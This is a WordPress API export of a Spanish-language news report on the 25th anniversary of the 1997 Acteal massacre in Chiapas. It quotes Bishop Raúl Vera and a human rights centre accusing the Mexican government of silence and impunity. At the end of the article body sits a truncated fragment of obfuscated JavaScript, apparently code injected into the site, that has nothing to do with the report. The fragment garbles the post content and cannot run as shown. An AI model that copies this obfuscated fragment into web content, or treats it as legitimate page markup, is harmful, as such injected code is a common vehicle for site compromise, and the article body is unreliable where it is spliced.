{"id":7551,"date":"2022-12-23T01:42:20","date_gmt":"2022-12-23T01:42:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7551"},"modified":"2022-12-23T01:42:21","modified_gmt":"2022-12-23T01:42:21","slug":"lucha-de-acteal-con-gran-impacto-en-el-mundo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7551","title":{"rendered":"Lucha de Acteal, con gran impacto en el mundo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"850\" height=\"567\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-22-at-4.15.02-PM.jpeg\" alt=\"\" class=\"wp-image-7552\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-22-at-4.15.02-PM.jpeg 850w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-22-at-4.15.02-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/WhatsApp-Image-2022-12-22-at-4.15.02-PM-768x512.jpeg 768w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>22 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- \u201cLos m\u00e1rtires Acteal luchan no solo por la paz en Chiapas y M\u00e9xico, sino por el mundo, as\u00ed que hay que celebrar los 25 a\u00f1os de martirio, celebrar en medio del dolor, dios nos convirti\u00f3 en luz, en fuerza, en paz para muchos lugares\u201d, as\u00ed lo manifest\u00f3 el obispo em\u00e9rito de San Crist\u00f3bal, Jos\u00e9 Ra\u00fal Vera L\u00f3pez, durante su participaci\u00f3n en el inicio  de las celebraciones por los 30 a\u00f1os de la fundaci\u00f3n de Las Abejas y 25 a\u00f1os de la masacre de Acteal. Durante las actividades, se\u00f1alaron que el actual gobierno federal ha mantenido el silencio, y abiertamente negado ante la Comisi\u00f3n y la Corte Interamericana de Derechos Humanos (CIDH) el involucramiento de autoridades mexicanas en acciones de contrainsurgencia durante los a\u00f1os noventa en Chiapas, \u201cy ha excluido conscientemente este periodo del proceso de estudio de la Comisi\u00f3n de la Verdad para la guerra sucia en M\u00e9xico\u201d. \u201cLa falsedad y los pactos de impunidad son una agresi\u00f3n que mantiene la herida abierta de la masacre ocurrida el 22 diciembre de 1997, que revictimiza, y profundiza el dolor colectivo. En medio de la protecci\u00f3n de las \u00e9lites pol\u00edtica y militar, cualquier acci\u00f3n publicitada como reparaci\u00f3n integral y justicia transicional son una absoluta simulaci\u00f3n\u201d, aseguraron al dar lectura a un pronunciamiento. El Centro de Derechos Humanos Fray Bartolom\u00e9 de Las Casas, manifest\u00f3 respeto a la Organizaci\u00f3n Sociedad Civil de Las Abejas de Acteal, \u201cque muchos soles le sigan recorriendo, que frente al dolor encuentren tambi\u00e9n alegr\u00eda en todo lo digno que han construido en 30 a\u00f1os, que la autonom\u00eda siga creciendo, que sepan que alrededor de ustedes existimos muchas personas que no olvidamos y que esperamos que esa memoria sea para ustedes s\u00edmbolo de justicia\u201d. <\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 22 de Diciembre del 2022. San Crist\u00f3bal de Las Casas.- \u201cLos m\u00e1rtires Acteal luchan no solo por la paz en Chiapas y M\u00e9xico, sino por el mundo, as\u00ed que hay que celebrar los 25 a\u00f1os de martirio, celebrar en medio del dolor, dios nos convirti\u00f3 en luz, en fuerza, en paz para muchos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7552,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7551","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7551","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7551"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7551\/revisions"}],"predecessor-version":[{"id":7553,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7551\/revisions\/7553"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7552"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7551"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7551"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7551"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}